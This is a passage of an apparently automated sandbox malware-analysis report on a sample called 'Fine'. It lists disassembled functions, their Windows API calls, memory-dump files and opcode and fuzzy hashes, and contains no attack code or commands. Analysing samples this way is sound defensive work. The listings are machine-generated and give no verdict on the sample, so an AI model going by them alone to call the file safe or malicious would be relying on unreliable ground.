                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001D78B1
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 001D78C5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 001D78CF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6e9fb37ab4951c0179107265c655c58f9ad025f90041af7c069c9cb7812ff915
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9db1437613a2c144013907a4a7be888038308efe7045768cc74fdf133dcbd2ee
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e9fb37ab4951c0179107265c655c58f9ad025f90041af7c069c9cb7812ff915
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11ED72A01109BFDF025F94EC58EEABB68FF08364F000116FA0052260E7729C60FBA0
                                                                                                                                                                                                                                                                                                                            Function 002033E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0020338D,00000364,00000000,00000000,00000000,?,002035FE,00000006,FlsSetValue), ref: 00203418
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0020338D,00000364,00000000,00000000,00000000,?,002035FE,00000006,FlsSetValue,00273260,FlsSetValue,00000000,00000364,?,002031B9), ref: 00203424
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0020338D,00000364,00000000,00000000,00000000,?,002035FE,00000006,FlsSetValue,00273260,FlsSetValue,00000000), ref: 00203432
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3c1d6551f3a156834c31c7f412e34fe638f55039b6388f837617c12d709ba24c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dea38688c34865faa9ab0fde7e997bbb67691d018f5cff23eaebe7f52605da88
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1d6551f3a156834c31c7f412e34fe638f55039b6388f837617c12d709ba24c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B101D432B313279BCB22CF79AC489563B5CAF05B717214220F90ADB2C2D761DA21C6E0
                                                                                                                                                                                                                                                                                                                            Function 0023BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BA8B
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BAB0
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BABA
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BAED
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: db5127930c608264062f726a314945bb4e50ac96b93d3f809d4b2fcec75cfe6c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2f97223273936adef70c63ce4732803b37b5dbd5397960c88804062665995cd4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db5127930c608264062f726a314945bb4e50ac96b93d3f809d4b2fcec75cfe6c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6115BB1D10A2DE7CF01DFE9E9497EEBB78BF0A711F104095DA81B2140CBB09660CBA5
                                                                                                                                                                                                                                                                                                                            Function 0026886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0026888E
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 002688A6
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 002688CA
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002688E5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 902c3410ea22a4ebdc2ee5854ffbed0f476835eaaee6436c33eaa51618e8d8c3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ce409a2b04ecd411859cebd51a3edf9d5bac7ee8882f11c8d5350943c7d1a031
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 902c3410ea22a4ebdc2ee5854ffbed0f476835eaaee6436c33eaa51618e8d8c3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 391143B9D0020EAFDB41CF98D8849EEBBB9FB08310F508156E915E3220D775AA94CF90
                                                                                                                                                                                                                                                                                                                            Function 002336F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00233712
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00233723
                                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0023372A
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00233731
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 79f9b3a28c8b9a4e525ebac8dd13277848d0ecaef5aa244059cf8e53a1f619b7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bec5a162e10a2c5acd65eb2567171cfede0e4b81c2fdd07316187ccaff1fbddf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79f9b3a28c8b9a4e525ebac8dd13277848d0ecaef5aa244059cf8e53a1f619b7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80E09BF166122877DB205B62BC4DEE7BF5CEF42BA1F104015F105D1090DAE4C640C5B1
                                                                                                                                                                                                                                                                                                                            Function 002692BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D1F87
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1F96
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: BeginPath.GDI32(?), ref: 001D1FAD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1FD6
                                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002692E3
                                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 002692F0
                                                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00269300
                                                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 0026930E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 09bbb1f24d44c3feaf1afe59b76a608c6e9cea03fd7595fcd2d7e88a537482d8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3c917afbfed3bf5484633a01f934d10ea327dcaf6beeb2e12a53b1a31a7d0631
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09bbb1f24d44c3feaf1afe59b76a608c6e9cea03fd7595fcd2d7e88a537482d8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F0BE31111259BBDB121F54BC0EFCE3F59AF0A320F008040FA11611E1CBB455658FE5
                                                                                                                                                                                                                                                                                                                            Function 001D21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 001D21BC
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 001D21C6
                                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 001D21D9
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 001D21E1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cf7aa7d98a76e7653e8f5bbdbd739b8a90b6535c7a1541b0656b5484e3f1c644
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d577474d97c02ec1049703987d15402f5fa74ec3d9885162e10806fe4ae4dfb2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf7aa7d98a76e7653e8f5bbdbd739b8a90b6535c7a1541b0656b5484e3f1c644
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E06532740244ABDB215F75BC0DBE83B51AB26335F04C269F7BA540E0C7F186909B10
                                                                                                                                                                                                                                                                                                                            Function 0022EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0022EC36
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0022EC40
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0022EC60
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 0022EC81
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f58b0d6ec1ff1c959f67bbd9b0842c4681185deb9d9e5d2ab66b70ca928d803
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 80efb2c97b5c4584b65e20d2e40b98623e4d25bce2d3d4e05dd2b9e860164f09
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f58b0d6ec1ff1c959f67bbd9b0842c4681185deb9d9e5d2ab66b70ca928d803
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95E01A74D00208EFCF40AFA1E90CA5DBBF5EB18311F20C40AE80AE3290C7B85901AF01
                                                                                                                                                                                                                                                                                                                            Function 0022EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0022EC4A
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0022EC54
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0022EC60
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 0022EC81
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 440670cecfec6e3304a0471e69bd581b970f872bcc1dc1ee33b7e0ba0e573586
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f046051af84f7d52d76a4f2d34e64c564ba1c4fdc8189042eca25d9fd7b139ab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 440670cecfec6e3304a0471e69bd581b970f872bcc1dc1ee33b7e0ba0e573586
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49E09A75D00208DFCF519FA1E94CA5DBBF5AB58311F10C459E94AE7290C7B969019F11
                                                                                                                                                                                                                                                                                                                            Function 00223616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                                                            • String ID: @COM_EVENTOBJ$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-2369506278
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a667fde45e4ab81717db1a315029cf6726b21c0b2294b51f719a3dda0f2100e0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a65c6612e55d422f3133331200b8b5d8ee378e3c97a2999493fe2a5ce4dfb80
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a667fde45e4ab81717db1a315029cf6726b21c0b2294b51f719a3dda0f2100e0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF1ED70A18315EFCB24DF54D881B6AB3E1BF94304F10881DF58A9B261C779EA65CF82
                                                                                                                                                                                                                                                                                                                            Function 002585DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F05B2: EnterCriticalSection.KERNEL32(002A170C,?,00000000,?,001DD22A,002A3570,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?), ref: 001F05BD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F05B2: LeaveCriticalSection.KERNEL32(002A170C,?,001DD22A,002A3570,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?,00000001,002A2430), ref: 001F05FA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0413: __onexit.LIBCMT ref: 001F0419
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00258658
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0568: EnterCriticalSection.KERNEL32(002A170C,00000000,?,001DD258,002A3570,002127C9,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?), ref: 001F0572
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0568: LeaveCriticalSection.KERNEL32(002A170C,?,001DD258,002A3570,002127C9,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?,00000001), ref: 001F05A5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 535116098-3746618543
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 412ec7a90eb3c64c5c3c0ec4998f616500fcfa46fe2f7bf95fd24c1d55f7b3d7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a453b750916e0f1559cbdcb6ce39b40b64cca014bf0226d593e6d5ea889b9e6f
